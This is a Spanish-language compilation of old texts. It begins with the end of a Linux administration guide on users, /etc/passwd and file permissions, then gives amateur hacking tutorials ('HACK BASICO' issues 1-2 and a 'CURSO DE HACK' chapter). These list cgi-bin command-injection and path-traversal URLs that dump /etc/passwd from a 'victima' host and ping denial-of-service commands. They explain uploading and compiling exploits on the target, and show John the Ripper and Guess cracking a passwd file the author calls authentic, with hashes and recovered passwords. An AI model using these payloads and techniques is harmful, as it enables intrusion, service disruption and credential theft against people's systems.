  espere disponer de estos comandos. Y ademas, hay algunos aspectos del
  control de tareas que difieren entre Bash y Tcsh. De hecho, algunas shells
  no proporcionan ningun control de tareas sin embargo, la mayoria de las
  shells disponibles para Linux soportan control de tareas.

        #CAPITULO VI

        Administracion de Usuarios

        Este es uno de los temas mas importantes para quien ser el
  administrador del sistema. Gran parte de la seguridad del sistema depender
  de la correcta administracion y control de los usuarios, el administrador
  puede tomar dos posturas incorrectas a la hora de proteger el sistema una
  seria el exceso de celo en el cuidado lo que muchas veces va a resultar
  molesto a los usuarios y la otra es ser muy confiado lo que seguro va a
  traer complicaciones con los usuarios experimentados, la postura que yo
  recomiendo el una intermedia. Administrar un sistema es algo asi como
  cuidar la novia o esposa. Independientemente de que tenga muchos usuarios o
  no en su sistema, es importante comprender los aspectos de la gestion de
  usuarios bajo Linux. Incluso si se es el unico usuario, se debe tener,
  presumiblemente, una cuenta distinta de root para hacer la mayor parte del
  trabajo.

        Cada persona que utilice el sistema debe tener su propia cuenta. Es
  una malisima idea el que varias personas compartan la misma cuenta. No solo
  es un problema de seguridad, sino que las cuentas se utilizan para
  identificar univocamente a los usuarios del sistema. Se necesita ser capaz
  de saber quien esta haciendo que en cada momento que queramos.

        Usuario: podriamos definir como usuario a cada persona que pueda
  logearse al sistema, el que para ello deber ser validado por el
  superusuario. A cada usuario le corresponder lo que se llama "Cuenta" una
  cuenta son lo recursos que se le asignan a ese usuario. A su vez cuando el
  usuario de loguea, se dice que inicia una sesion.

        Para la correcta administracion de los usuarios, tendremos que cargar
  toda la informacion que el sistema necesita a fin de identificar como ya
  dijimos univocamente a cada uno. La mayoria de esta informacion la
  encontraremos en el archivo "passwd" que se encuentra en el directorio
  "/etc" a continuacion hago un detalle de esa informacion.

  * Nombre de usuario: El nombre de usuario es el identificador unico dado a
    cada usuario del sistema. Ejemplos de nombres de usuario son juan, jerez
    y mariag. Se puede utilizar letras y digitos junto a los caracteres "_"
    (subrayado) y "." (Punto). Los nombres de usuario se limitan normalmente
    a 8 caracteres de longitud.

  * User ID: El user ID, o UID, es un numero unico dado a cada usuario del
    sistema. El sistema normalmente mantiene la pista de la informacion por
    UID, no por nombre de usuario.

  * Group ID: El group ID, o GID, es la identificacion del grupo del usuario
    por defecto. Cada usuario pertenece a uno o mas grupos definidos por el
    administrador del sistema.

  * Clave: El sistema tambien almacena la clave encriptada del usuario. El
    comando passwd se utiliza para poner y cambiar las claves de los usuarios.

  * Nombre completo: El "nombre real" o "nombre completo" del usuario se
    almacena junto con el nombre de usuario. Por ejemplo, el usuario jperez
    se llama "Juan Perez" en la vida real.

  * Directorio inicial: El directorio inicial es el directorio en el que se
    coloca inicialmente al usuario en tiempo de conexion. Cada usuario debe
    tener su propio directorio inicial, normalmente situado bajo /home.

  * Shell de inicio: El shell de inicio del usuario es el interprete de
    comandos que es arrancado para el usuario en tiempo de conexion. Ejemplos
    pueden ser /bin/bash y /bin/tcsh.

        Como ya dije el fichero /etc/passwd contiene la informacion anterior
  acerca de los usuarios. Cada linea del fichero contiene informacion acerca
  de un unico usuario; el formato de cada linea es:

  nombre:clave encriptada:UID:GID:nombre completo:dir.inicio:shell

        Un ejemplo puede ser:

  jperez:Xv8Q981g71oKK:102:100:Juan Perez:/home/jperez:/bin/bash

        Como puede verse, el primer campo , "jperez", es el nombre de usuario.

        El siguiente campo, "Xv8Q981g71oKK", es la clave encriptada. Las
  claves no se almacenan en el sistema en ningun formato legible por el
  hombre. Las claves se encriptan utilizandose a si mismas como clave secreta.
  En otras palabras, solo si se conoce la clave, esta puede ser desencriptada.
  Esta forma de encriptacion es bastante segura.

        Algunos sistemas utilizan "claves en sombra" en la que la informacion
  de las claves se relega al fichero /etc/shadow. Puesto que /etc/passwd es
  legible por todo el mundo, /etc/shadow suministra un grado extra de
  seguridad, puesto que este no lo es. Las claves en sombra suministran
  algunas otras funciones como puede ser la expiracion de claves;

        El tercer campo "102", es el UID. Este debe ser unico para cada
  usuario.

        El cuarto campo, "100", es el GID. Este usuario pertenece al grupo
  numerado 100. La informacion de grupos, como la informacion de usuarios, se
  almacena en el fichero /etc/group. El quinto campo es el nombre completo
  del usuario. "Juan Perez".

        Los dos ultimos campos son el directorio inicial del usuario
  (/home/kiwi) y el shell (/bin/bash), respectivamente. No es necesario que el
  directorio inicial de un usuario tenga el mismo nombre que el del nombre de
  usuario. Sin embargo, ayuda a identificar el directorio.

        Como agregar un usuario

        Cuando se aade un usuario hay varios pasos a seguir. Primero, se le
  debe crear una entrada en /etc/passwd, con un nombre de usuario y UID
  unicos. Se debe especificar el GID, nombre completo y resto de informacion.
  Se debe crear el directorio inicial, y poner los permisos en el directorio
  para que el usuario sea el dueo. Se deben suministrar ficheros de comandos
  de inicializacion en el nuevo directorio y se debe hacer alguna otra
  configuracion del sistema (por ejemplo, preparar un buzon para el correo
  electronico entrante para el nuevo usuario). Aunque todo esto puede ser
  hecho a mano es mucho mas sencillo y seguro usar un programa que se provee
  con Linux llamado "adduser" este programita nos ira preguntando uno a uno
  los datos necesarios y una vez completados se encargara de modificar todos
  los archivos necesarios de configuracion y crear los directorios necesarios.

        Como borrar un usuario.

        Para borrar un usuario nos basta con borrarlo del archivo "passwd" y
  eliminar tambien todos sus archivos y directorios. Esto se puede hacer a
  mano o usar deluser que es mas seguro. Tambien podemos deshabilitar al
  usuario colocando un asterisco en el lugar donde va la clave encriptada.

        Aqui es importante saber que el superusuario puede cambiar en
  cualquier momento la clave de cualquier usuario, mientras que cada usuario
  solo puede cambiar su clave si el root se lo permite. Asi tambien se puede
  habilitar a los usuarios para que cambien por ejemplo su shell y puedan
  elegir el que mas les guste.

        #Capitulo VII

        Permisos de Ficheros

        Conceptos de permisos de ficheros

        Al ser UNIX un sistema multiusuario, para proteger los archivos
  importantes del sistema tales como el archivo de claves o ficheros de
  usuarios particulares de la manipulacion por parte de otros, UNIX
  proporciona un mecanismo conocido como permisos de ficheros. Este mecanismo
  permite que ficheros y directorios "pertenezcan" a un usuario en particular.
  Por ejemplo, como jperez creo ficheros en su directorio "home", jperez es
  el propietario de esos ficheros y tiene acceso a ellos.

        UNIX tambien permite que los ficheros sean compartidos entre usuarios
  y grupos de usuarios. Si jperez lo desea, podria restringir el acceso a sus
  ficheros de forma que ningun otro usuario tenga acceso excepto el root por
  supuesto. De cualquier modo, en la mayoria de los sistemas por defecto se
  permite que otros usuarios puedan leer tus ficheros pero no modificarlos o
  borrarlos.

        Como hemos explicado arriba, cada fichero pertenece a un usuario en
  particular. Por otra parte, los ficheros tambien pertenecen a un grupo en
  particular, que es un conjunto de usuarios definido por el sistema. Cada
  usuario pertenece al menos a un grupo cuando es creado. El administrador
  del sistema puede hacer que un usuario tenga acceso a mas de un grupo.

        Los grupos usualmente son definidos por el tipo de usuarios que
  acceden a la maquina. Por ejemplo, en un sistema UNIX de una universidad,
  los usuarios pueden ser divididos en los grupos estudiantes, direccion,
  profesores e invitados. Hay tambien unos pocos grupos definidos por el
  sistema (como bin y admin) los cuales son usados por el propio sistema para
  controlar el acceso a los recursos muy raramente los usuarios normales
  pertenecen a estos grupos.

        Los permisos estan divididos en tres tipos: lectura, escritura y
  ejecucion. Estos permisos pueden ser fijados para tres clases de usuarios:
  el propietario del fichero, el grupo al que pertenece el fichero y para
  todos los usuarios independientemente del grupo.

        El permiso de lectura permite a un usuario leer el contenido del
  fichero o en el caso de un directorio, listar el contenido del mismo
  (usando ls). El permiso de escritura permite a un usuario escribir y
  modificar el fichero. Para directorios, el permiso de escritura permite
  crear nuevos ficheros o borrar ficheros ya existentes en dicho directorio.
  Por ultimo, el permiso de ejecucion permite a un usuario ejecutar el
  fichero si es un programa o script del shell. Para directorios, el permiso
  de ejecucion permite al usuario cambiar al directorio en cuestion con cd.

        Interpretando los permisos de ficheros

        Veamos un ejemplo del uso de premisos de ficheros.  Usando el
  comando ls con la opcin -l se mostrara un listado "largo" de los ficheros,
  el cual incluye los permisos de ficheros.

  -rwxr-xr-x     1 jperez       users      505 Mar 13 19:05        archivo

        Este fichero pertenece a jperez y al grupo users. Echemos un vistazo
  a los permisos. La cadena -rw-r--r-- nos informa, por orden, los tres
  primero corresponden al propietario, los que le siguen al grupo y los
  ultimos a todos. El primer caracter de la cadena de permisos ("-")
  representa el tipo. El "-" significa que es un archivo. Las siguientes tres
  letras ("rwx") representan los permisos para el propietario del fichero,
  jperez. El "r" para "lectura" y "w" para escritura y "x" para ejecucion.
  Los tres caracteres siguientes representan lo permisos del grupo, aqui
  vemos que este archivo tiene permisos de lectura y ejecucion del grupo.
  Y finalmente los ultimos tres caracteres representan los permisos para
  todos los usuarios, tambien de lectura e ejecucion.

        Dependencias

        Es importante darse cuenta de que los permisos de un fichero tambien
  dependen de los permisos del directorio en el que residen. Por ejemplo,
  aunque un fichero tenga los permisos -rwxrwxrwx, otros usuarios no podran
  acceder a el a menos que tambien tengan permiso de lectura y ejecucion para
  el directorio en el cual se encuentra el fichero. Si jperez quiere
  restringir el acceso a todos sus ficheros, podria simplemente poner los
  permisos de su directorio "home" /home/jperez a -rwx------. De esta forma
  ningun usuario podra acceder a su directorio ni a ninguno de sus ficheros o
  subdirectorios. Jperez no necesita preocuparse de los permisos individuales
  de cada uno de sus ficheros.

        En otras palabras, para acceder a un fichero, debes de tener permiso
  de ejecucion de todos los directorios a lo largo del camino de acceso al
  fichero, ademas de permiso de lectura (o ejecucion) del fichero en
  particular.

        Habitualmente, los usuarios de un sistema UNIX son muy abiertos con
  sus ficheros. Los permisos que se dan a los ficheros usualmente son
  -rw-r--r--, lo que permite a todos los dem s usuarios leer los ficheros,
  pero no modificarlos de ninguna forma. Los directorios, usualmente tienen
  los permisos -rwxr-xr-x, lo que permite que los demas usuarios puedan
  moverse y ver los directorios, pero sin poder crear o borrar nuevos
  ficheros en ellos.

        Muchos usuarios pueden querer limitar el acceso de otros usuarios a
  sus ficheros. Poniendo los permisos de un fichero a -rw------- no se
  permitir a ningun otro usuario acceder al fichero. Igualmente, poniendo los
  permisos del directorio a -rwx------ no se permitir  a los demas usuarios
  acceder al directorio en cuestion.

        Cambiando permisos

        El comando "chmod" se usa para establecer los permisos de un fichero.
  Solo el propietario puede cambiar los permisos del fichero. La sintaxis de
  chmod es: chmod {a,u,g,o}{+,-}{r,w,x} <archivo>

        Brevemente, indicamos a que usuarios afecta all, user, group o other.
  Entonces se especifica si se estan aadiendo permisos (+) o quit ndolos
  (-). Finalmente se especifica que tipo de permiso read, write o execute.
  Algunos ejemplos:

  chmod a+r archivo

        Da a todos los usuarios acceso al fichero.

  chmod +r archivo

        Como arriba si no se indica "a", "u", "g" u "o" por defecto se toma a.

  chmod og-x archivo

        Quita permisos de ejecucion a todos los usuarios excepto al
  propietario.

  chmod u+rwx archivo

        Permite al propietario leer, escribir y ejecutar el fichero.

  chmod o-rwx archivo

        Quita permisos de lectura, escritura y ejecucion a todos los usuarios
  menos al propietario y a los usuarios del grupo del fichero.

        Los usuarios mas experimentados pueden usar directamente la
  nomenclatura octal para asignar o quitar permisos.

        Grupos

        Como hemos citado anteriormente, cada usuario pertenece a uno o mas
  grupos. La unica importancia real de las relaciones de grupo es la
  perteneciente a los permisos de ficheros, como dijimos en la seccion 3.9,
  cada fichero tiene un "grupo propietario" y un conjunto de permisos de
  grupo que define de que forma pueden acceder al fichero los usuarios del
  grupo.

        Hay varios grupos definidos en el sistema, como pueden ser bin, mail,
  y sys.  Los usuarios no deben pertenecer a ninguno de estos grupos; se
  utilizan para permisos de ficheros del sistema. En su lugar, los usuarios
  deben pertenecer a un grupo individual, como users. Si se quiere ser
  detallista, se pueden mantener varios grupos de usuarios como por ejemplo
  estudiantes, directivos, profesores, soporte y facultad.

        El fichero /etc/group contiene informacion acerca de los grupos. El
  formato de cada linea es

        nombre de grupo:clave:GID:otros miembros

  Algunos ejemplos de grupos pueden ser:

  root:*:0:
  usuarios:*:100:jperez, lmamani
  invitados:*:200:
  otros:*:250:alumno

        El primer grupo, root, es un grupo especial del sistema reservado
  para la cuenta root. El siguiente grupo, users, es para usuarios normales.
  Tiene un GID de 100.  Los usuarios jperez y lmamani tienen acceso a este
  grupo. Recuerdese que en /etc/passwd cada usuario tiene un GID por defecto.
  Sin embargo, los usuarios pueden pertenecer a mas de un grupo, aadiendo
  sus nombres de usuario a otras lineas de grupo en /etc/group. El comando
  groups lista a que grupos se tiene acceso.

        El tercer grupo, invitados, es para usuarios invitados, y otros es
  para "otros" usuarios.  El usuario alumno tiene acceso a este grupo.

        Como se puede ver, el campo "clave" de /etc/group raramente se
  utiliza. A veces se utiliza para dar una clave para acceder a un grupo.
  Esto es raras veces necesario. Para evitar el que los usuarios cambien a
  grupos privilegiados (con el comando newgroup), se pone el campo de la
  clave a "*".

        Se pueden usar los comandos addgroup o groupadd para aadir grupos a
  su sistema. Normalmente es mas sencillo aadir lineas a /etc/group uno
  mismo, puesto que no se necesitan mas configuraciones para aadir un grupo.
  Para borrar un grupo, solo hay que borrar su entrada de /etc/group.

        #Glosario

  * Bugs: Errores en la confeccion de un programa.

  * Driver: programa encargado de servir de intermediario entre el sistema
            operativo y los distintos dispositivos conectados en el ordenador.

  * FAQ: Frecuent  Asked  Question. Cuestion frecuentemente preguntada.
         Recopilacion de preguntas y respuestas sobre las dudas mas
         frecuentes.

  * FTP: File Transfer Protocol: Protocolo utilizado para la transmision de
         ficheros.

  * GNU: GNU 's not UNIX. Frase recursiva que representa al proyecto
         encargado de la proteccion y creacion de software de libre
         distribucion.

  * Hacker: En su doble acepcion, persona que posee un nivel muy importante
            de conocimientos en Unix, experto. Tambien se dice que un hacker
            es aquel que utiliza sus extensos conocimientos de informatica
            para "romper" sistemas de seguridad.

  * HOWTO: Como ir hacia. como conseguir. Documentacion especifica obre algun
           aspecto concreto de Linux (impresoras, redes, UPS, etc.

  * Kernel: nucleo. En Linux, parte principal del sistema operativo. Codigo
            fuente del propio sistema.

  * LDP: Linux Documentacion Project: Proyecto para la Documentacion de Linux.

  * LILO: LInux LOader. Cargador de Linux. Pequeo programa que permite el
          arranque de uno o varios sistemas operativos situados en una misma
          maquina. LILO puede poner en marcha, OS/2, Linux, MS-DOS,
          Windows'95, SCO, etc.

  * LSM: Linux Software Map. "Mapa" de software para Linux. Base de datos que
         recoge la mayor parte del software disponible para Linux, asi como
         su autor, descripcion, localizacion, observaciones, etc.

  * Mainframe: Ordenador principal. Equipo de muy altas prestaciones, Host.

  * NFS: Network Filey System: Sistemas de ficheros en red.

  * online on-line: en linea, en conexion. Documentacion on-line: documentos
                    disponibles a traves de sistemas telematicos.

  * script: Guion. Shell script: guion para el procesador de 'ordenes.
            Programa batch. Equivalente en Unix a los ficheros BAT de MS-DOS.

  * Shell: Interprete de ordenes o comandos. Programa intermediario entre el
           sistema operativo y el usuario. Imaginatelo como si fuera el
           sustituto del COMMAND.COM de MS-DOS. Linux soporta varias shells
           diferentes (bash, ksh, cshell...).

  * Stdin: entrada standard; usualmente el teclado.

  * Stdout: salida standard; usualmente la pantalla.

  * Swap: Intercambio.

  * swap space: Area de intercambio. Memoria virtual. Zona de almacenamiento
                en disco (fichero o particion) que sirve como prolongacion de
                la memoria RAM realmente instalada, permitiendo la ejecucion
                de procesos que, de otra forma, requeririan una ampliacion
                fisica de dicha RAM.

        IMPORTANTE: Todo el material aqui incluido es de libre copia y
  distribucion por cualquier medio y soporte siempre que se conserve integro,
  en caso de reproduccion parcial se debe citar la fuente. La confeccion de
  esta guia corresponde a LeTaL, es fruto de la experiencia personal y de la
  recopilacion de documentacion del LDP (Linux Documentation Proyect)
  traducida por mi o por el Proyectos LuCas (Lunix en Castellano).

  Agradecimientos: A Linus Torvalds. LuCas, S.L.U.G, J.J.F. / HACKERS TEAM.

<>

<>

                   /***********************************\
                    **                               ** 
                    **    HACK BASICO by \Wend|g0    ** 
                    **                               **
                    **          Numero 1             **
                    **                               **  
                   \***********************************/

  TEMAS:

  - Introduccion
  - Lista de puertos
  - Bugs sobre cgi-bin
  - Como empezar a usar el John the Ripper

______________________________________________________________________________


        Antes de nada k nadie me confunda con el wendigo perteneciente al SHE,
  ya k yo no soy el. En principio estos textos son para gente que komo yo les
  gusta este ambiente pero no saben mucho y nadie les ayuda en su aprendizaje.
  Que quede muy claro que no quiero dar clases a nadie ya que la mayoria sabe
  mas que yo. Lo que opino es que hay mucha gente empezando que no les vendra
  mal y se haran una vaga idea de como comenzar. Usea, k si ya sabes algo del
  tema pierdes el tiempo leyendo esta serie de txts.

        Lo primero que debes hacer para poder entrar en cualquier sistema es
  recopilar toda la informacion posible acerca de el.

  -Version de sistema
  -Version de sendmail  (Se saca haciendo un telnet al puerto del sendmail
                         k es el 25)
  -Version del FTP      (Puerto 21)
  -Ver si exporta direcorios al exterior   (Desde linux  >Showmount -e host)
               
  etc... Asi sabremos k bug ( fallo de sistema ) explotar.

        Para empezar voy a explicar los puertos. Existen numerosos puertos
  por los k entrar o interactuar con un host. Para k te kede klaro uno de
  los puertos k mas has utilizado es el 80, k es el puerto HTTP (hiper text
  transfer protocol). El FTP tambien tiene el suyo propio, el 21.  Bueno,
  kizas el k mas uses a partir de ahora sea el 23 (TELNET). Aki va una lista
  de los puertos mas comunes para utilizar. No son todos pero si algunos de
  los mas importantes.

  **********************************************

  discard                  9
  netstat                 15
  chargen                 19  
  ftp                     21  
  telnet                  23  
  smtp  (sendmail)        25  
  rlp                     39  
  bootp                   67
  fingerk                 79  
  http                    80 / 8080
  military http           80 / 8080 / 5580  
  link                    87  
  pop3                   110
  identd                 113  
  nntp                   119  
  newsk                  144  
  execk                  512  
  login                  513  
  pkill                  515  
  ktalk                  517  
  ntalk                  518  
  netwall                533
  rmontior               560  
  montior                561
  kerberos               750

  **********************************************
	
        Bueno, y despues de esto diras... y ahora que debo hacer? Pues komo
  no es necesario explicarte, supongo k konoceras el tema del /etc/passwd no?,
  pues eso, si lo puedes pillar por ftp anonimo hazlo aunke no creo k sea
  verdadero, es decir, muy gilipoyas tendria k ser el ROOT. Revisa la version
  de sendmail y busca por tu disco duro algun exploit k funcione, ves a URLs
  komo www.rootshell.com o raregazz.islatortuga.com/utiles.htm y rebusca
  hasta pillar alguno. Usa cuentas por defecto, haz "surfeo" o cualkier otra
  cosa. Lo k se te pueda okurrir...

        Tambien puedes intentar algo muy sencillo k es el PHF. Muchos host no
  tienen este bug pero te asombrarias de la cantidad de administradores
  penosos k ahi. Ademas, intentalo siempre, no vaya a ser k funcione XDDD.

  Abre tu navegador habitual y escribe:

  http://aki pon el nombre o IP de tu host
  victima/cgi-bin/phf?Query=x%0acat%20/etc/passwd

        Con este bug tu puedes usar comandos del UNIX desde tu navegador
  mismo. increible, no?

        Pero me diras... Y k komandos puedo usar? Pues de momento aprendete
  los basicos. Al lado esta la ekivalencia kon los del DOS

  dir = ls (-a)archivos okultos
  ver = uname -a (version del sistema)
  cat = type 
  cd = cd
  cls = clear

        Estos komo minimo debes saberlos YA MISMO. Sigamos kon la tecnica
  phf. Si te fijas despues de la letra "a" viene el comando cat. Ahi es
  donde nosotros debemos empezar a poner nuestras ordenes deseadas. Pero...
  Y los espacios? komo los dejamos? Ajaja amigo ... Los espacios los debes
  poner komo %20 lo ves mas claro ahora? Ademas puedes usar modificadores
  pero ten encuenta siempre estos espacios.

        Bueno, te voy a poner una serie mas de bugs por cgi-bin bastante
  completita para que vayas jugando un pokillo mas.

http://www.victima.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
http://www.victima.com/cgi-bin/php.cgi?/etc/passwd
http://www.victima.com/cgi-bin/phf?Qalias=hell%0acat%20/etc/passwd%0a
http://www.victima.com/cgi-bin/phf?Qalias=hell%0auname%20-a%0a
http://www.victima.com/cgi-bin/handler/whatever;cat /etc/passwd|?data=Download
http://www.victima.com/cgi-bin/campas?%0acat%0a/etc/passwd%0a
http://www.victima.com/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
http://www.victima.com/cgi-bin/view-source?../../../../../../../etc/passwd
http://www.victima.com/cgi-bin/phf?Jserver=k%0Acat%20/etc/passwd%0a&Qname=d
http://www.victima.com/cgi-bin/phf?Jserver=k%0Afinger%0a&Qname=d
http://www.victima.com/cgi-bin/nph-test-cgi?/*

        Bueno koleguilla... Debes ahora hacerte con un buen crakeador de
  pass. El que yo te recomiendo es el Ripper. Segun comparativas es el mas
  rapido que existe. Esta repleto de opciones muy interesantes que debes ir
  descubriendo por ti mismo. Yo lo uso de dos maneras simples ya k tampoko
  necesito mas. La primera es usando diccionarios de palabras k te puedes
  bajar de ftps. La segunda es crakearlo a lo bestia usando todas las
  posibles combinaciones de palabras. Esto yo lo hago en casos extremos ya
  k es un proceso inacabable.

        Comandos que puedes usar con el Ripper:

  Para usar diccionarios escribe:
   john -rules -pwfile:<nombre del fichero> -wordfile:<nombre del diccionario>
  " " modo bestia " john -incremental:all -pwfile:<nombre del fichero>
  (todo tipo de caracteres)
  " " modo bestia " john -incremental:digits -pwfile:<nombre del fichero>
  (solo numeros)
  " " modo bestia " john -incremental:alpha -pwfile:<nombre del fichero>
  (solo letras)
  " " modo bestia " john -incremental:capital -pwfile:<nombre del fichero>
  (con mayusculas)
  john -des -incremental -pwfile:<nombre del fichero>
  john -restore (restaura una sesion despues de haber sido cortada) 

        Esto es todo por ahora. Si te apetece discutirme o preguntarme algo
  mi email es wendigo13@hotmail.com

                /***********************************\
                 **                               ** 
                 **    HACK BASICO by \Wend|g0    ** 
                 **                               **
                 **         Numero 2              **
                 **                               **  
                \***********************************/

  TEMAS:

  - Comandos de win95
  - Compilar exploits

______________________________________________________________________________

        Bueno kolega, ya tienes el ficherito famoso, no?. No me apetece
  explicarte k se divide en tantas partes, k la primera es el login, la
  segunda el passw...  SUPONGO K YA LO SABES. Sino pillate docs en los k se
  explica continuamente Y ahora... k hago?. Supongo k habras pillao la
  version de sistema y de sendmail, no? pues entonces !!! Hazlo !!!
  k no sabes?????
 
        Escribe en el sistema esto: ( en un unix, no en ms-dos XDDDD )

  # uname -a

        Sencillo, no? Esto te dara la version del SO donde estas metido de
  "strangis". Yasta, ahora un exploit k sirva pa este sistema y usalo. Para
  usarlos debes subirlos al ordenata k intentas atakar. Yo uso el Ws_ftp pero
  si no tienes ninguno incluso puedes usar el k viene con win95. Viene uno
  con WIN95 ???? NO JODASSS !!! Pues si. Escribe ftp en alguna ventana
  ms-dos y se te cambiara el prompt a ftp>
        Luego escribes open host_a_hackear y listo. Asegurate k el exploit k
  vas a subir esta en el mismo directorio donde ejecutas el ftp. Aki va una
  lista de las ordenes del ftp para poder usarlo sin problemas ...

  !               delete          literal         prompt          send
  ?               debug           ls              put             status
  append          dir             mdelete         pwd             trace
  ascii           disconnect      mdir            quit            type
  bell            get             mget            quote           user
  binary          glob            mkdir           recv            verbose
  bye             hash            mls             remotehelp
  cd              help            mput            rename
  close           lcd             open            rmdir

        No te voy a explicar pa k sirve cada uno ya k hay algunos k ni lo se.
  Ante todo sinceridad XDDDD. Para salir del ftp> escribe Bye y listo y para
  subir un exploit u lo k kieras put nombre_del_fichero.

        Ufff... Esto kansa bastante, en serio. Personalmente prefiero leer k
  escribir :). Mas programillas k existen el el directorio WinDowS (sistema
  operativo pseudomultitarea de 16 bits) y k pueden o no ser de utilidad...

        TRACERT.EXE Va "trazando" todos los hosts desde el tuyo hasta el
  ekipo al k konectas. Pruebalo, es interesante.

        PING.EXE Ni k decir tiene pa k sirve. Usado con fines maleficos puede
  tirar mucha mas pea de la k os creeis. Ahi van algunos pings, no se si
  funcionan todos ya k no los he probao. Me los pasaron el otro dia.

  ping -l 65510                    Atake de DoS "Denial oF Service"
  ping -s 1 -f                     Tira equipos IBM
  ping -s ip-del-lamer 1024        

            Todos no funcionan en windows... :)

        NBTSTAT.EXE Jejeje, esta es una de las maneras mas faciles de meterte
  en el ordenador de alguien, en serio. Ir probando a ver k konseguis y en el
  proximo numero os explicare como meterte en el ordenata de alguien y
  dejarlo "acojonao". Funciona kuando alguien tiene alguna carpeta compartida
  o mejor aun un disko duro. Ahi es donde entraria la "ingenieria social".
  Escribe nbtstat -A ip_del_lamer y edita el archivo hosts.sam poniendo su IP.

        ARP.EXE Otra utilidad pa probar XDDD. Sinceramente tengo una vaga
  idea de para k sirve asin k si alguien kiere explicarmelo gustosamente
  aceptare.

        Bueeeeeeno, a lo k ibamos... komo se compila un puetero exploit ya
  dentro del UNIX.victima.es? Debes usar el gcc y el cc. A menudo te pone en
  los exploits la orden pa compilarlo correctamente. La orden normal a no
  ser k te digan otra, seria... $ gcc -o exploit exploit.c Asi se te crearia
  un archivo ejecutable listo pa hacerlo funcionar. Si no funciona ves
  probando con cc o c++ en vez de gcc. No obstante en algunos sistemas te
  puedes encontrar con que no "existe" compilador alguno, al menos para el
  usuario sin privilegios.

<>

<>

                              - CURSO DE HACK - 
                                  CHAPTER VI

        Bueno pues ya estamos en la 6 entrega de este cursillo de hack, en
  esta entrega he pensado que os explicare el funcionamiento de un crackeador
  de password, lo mas seguro es que ya sepais hacerlo, para lo que si pues
  ahora repasais y para los que no, ya es hora de aprender :)

        Crackeadores de passwords ahi mil, pero por suerte son todos muy
  parecidos en el uso, ademas que casi todos los s.o. tienen pero como aqui
  nos enfocamos solo en Unix/Linux los otros los daremos de pasada. No creo
  necesario incluir una explicacion de la estructura del famoso fichero
  /etc/passwd, el cual es el que interesa. Existen muchos documentos por
  Internet que explican el fichero passwd, ademas que en este ezine en otros
  numeros ya a sido tratado, por lo que recomiendo una pasadita en los
  numeros anteriores.

        Ahora nos ponemos en accion, supongamos que ya tenemos el fichero
  passwd de un servidor cualquiera, hemos copiado el fichero a nuestro HD y
  ahora usaremos el crackeador que mas nos guste, como ya he dicho existen
  muchos, en este caso usare varios distintos para que veias la diferencia :)

        Ejecuto en este caso el John The Ripper, uno de los mas famosos y
  como vereis estoy usando la version 1.5 la cual es la ultima.

  D:\hacker\john>john

  John the Ripper  Version 1.5  Copyright (c) 1996-98 by Solar Designer

  Usage: //D/HACKER/JOHN/john [OPTIONS] [PASSWORD-FILES]
  -single                   "single crack" mode
  -wordfile:FILE -stdin     wordlist mode, read words from FILE or stdin
  -rules                    enable rules for wordlist mode
  -incremental[:MODE]       incremental mode [using section MODE]
  -external:MODE            external mode or word filter
  -restore[:FILE]           restore an interrupted session [from FILE]
  -session:FILE             set session file name to FILE
  -makechars:FILE           make a charset, FILE will be overwritten
  -show                     show cracked passwords
  -test                     perform a benchmark
  -users:[-]LOGIN|UID[,..]  load this (these) user(s) only
  -groups:[-]GID[,..]       load users of this (these) group(s) only
  -shells:[-]SHELL[,..]     load users with this (these) shell(s) only
  -salts:[-]COUNT           load salts with at least COUNT passwords only
  -format:NAME              force ciphertext format NAME (DES, BSDI, MD5, BF)
  -savemem:LEVEL            enable memory saving, at LEVEL 1..3

  D:\hacker\john>

        Como haveis podido notar estoy usando la version MS-DOS,
  sencillamente es el s.o. en el cual encontraremos mas crackeadores y ademas
  es la forma que mas gente utiliza, por eso prefiero usar el MS-DOS para este
  caso pero es igualito que en Unix/Linux.

        ahora le damos al John un fichero passwd, pero con la opcion single,
  y el resultado sera el siguiente:

  D:\hacker\john>john -single echpass

  John the Ripper  Version 1.5  Copyright (c) 1996-98 by Solar Designer

  Loaded 3 passwords with 3 different salts (Standard DES [24/32 4K])
  wnnwnn           (wnn)
  oracle6          (oracle)
  guesses: 2  time: 0:00:00:00 100%  c/s: 2840  trying: root1958 - r1969

  D:\hacker\john>

        Podemos apreciar que el John a encontrado 2 cuentas, decir que el
  passwd que estoy usando es autentico :) pero posee muy pocas cuenta por lo
  que creo que es passwd perfecto para este proposito. La cuenta son las
  siguientes:

  oracle:vM5OPrBhNOeGY:2000:2000::/opt/oracle:/bin/csh
  wnn:WtTIftFaGSXTM:2005:2005::/tmp:/bin/csh

        Esto para el que quiera comprobar la autenticidad de los mismos :)
  Ahora lo que nos interesa es usar un diccionario con el John ya que asi
  podra comparar el diccionario con el passwd y obtener las contraseas de
  las cuenta que coincidan. Y para ello ejecutamos la sigueinte linea:

  D:\hacker\john>john -wordfile:password.lst echpass

  John the Ripper  Version 1.5  Copyright (c) 1996-98 by Solar Designer

  Loaded 1 password (Standard DES [24/32 4K])
  guesses: 0  time: 0:00:00:00 100%  c/s: 2268  trying: sailor - zhongguo

  D:\hacker\john>

        Y como vemos el John en este caso no a encontrado nada, es logico
  ya que ninguna palabra que se usaban en las contraseas sale en el
  diccionario usado, el cual es el propio diccionario que trae el John. Lo
  aqui presentado es la forma mas basica, por lo que es recomendable que el
  lector realize sus propios experimentos y obtenga sus conclusiones.

        Ahora veremos otro famoso crackeador, el cual es conocido como
  Guess, y lo ejecutamos nos sale lo siguiente:

  D:\crack>guess

  GUESS: Unix Password Checker [Version 2.1]
  GUESS - Copyright 1991 Christian Beaumont
  C_BEAUMONT@UK.AC.LUT.HICOM and Sysop of fidonet node 2:250/301
  THIS IS A BETA TEST VERSION FOR PUBLIC DISTRIBUTION
  Use: GUESS [PASSWORD_FILE] [[OPTION] [DICTIONARY]] ...
  Options are:

        -a       Perform algorithmic check of password file
        -cWORD   Catch up to specified word in dictionary
        -sWORD   Check password file against specifed word only
        -uNAME   Limit checking of dictionary to a certain user name
        -w       Permit checking of dictionary to all users

  If you find GUESS useful or have any comments please feel free
  to contact me.

  Christian Beaumont +44-81-883-5683 (home) +44-81-680-1066 (work)

  D:\crack>

        Como vemos nos sale las diferentes opciones que lleva el programa,
  ahora ejecutaremos el Guess con el fichero de contraseas de la siguiente
  manera:

  D:\crack>guess echpass -a
  Reading password file ...
  ENTRIES  19
  BROKEN   0
  UNBROKEN 3
  PERCENT BROKEN  0
  Initialising tables
  Performing algorithmic check
  wnn is wnnwnn
  6 guesses in 0 seconds (109 guesses/sec 1 clocks)
